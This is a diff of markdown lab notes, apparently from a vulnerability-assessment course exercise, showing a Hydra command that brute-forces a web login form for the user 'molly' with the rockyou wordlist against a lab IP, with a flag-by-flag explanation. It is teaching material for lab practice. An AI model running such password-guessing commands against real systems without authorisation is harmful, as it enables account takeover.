iceman-sudo24/VA-WEEKLY-LABWORK/VA-W7-Hydra.md

 Run the following command to crack the web login:

-- hydra -l molly -P /usr/share/wordlists/rockyou.txt <MACHINE_IP> http-post-form "/login:username=^USER^&password=^PASS^:F=Your username or password is incorrect." -V -t 4
+- hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.49.154.94 http-post-form "/login:username=^USER^&password=^PASS^:F=Your username or password is incorrect." -V -t 4

 **Technical Breakdown:**
-- -l molly: Sets the static username to "molly".
+- `-l molly`: Sets the static username to "molly".
-- -P .../rockyou.txt: Points to the password wordlist.
+- `-P .../rockyou.txt`: Points to the password wordlist.
-- http-post-form: Specifies the module for web-based logins.
+- `http-post-form`: Specifies the module for web-based logins.
-- "/login...F=...": This string tells Hydra where to post, what data to send, and that the login Failed if the specific error message is seen.
+- `"/login...F=..."`: This string tells Hydra where to post, what data to send, and that the login Failed if the specific error message is seen.

 We are basically telling Hydra: "Go to this website, try every password in this list for the user 'molly.'
 If you see the words 'incorrect,' you failed—keep going.
 If you don't see those words, you found the password!"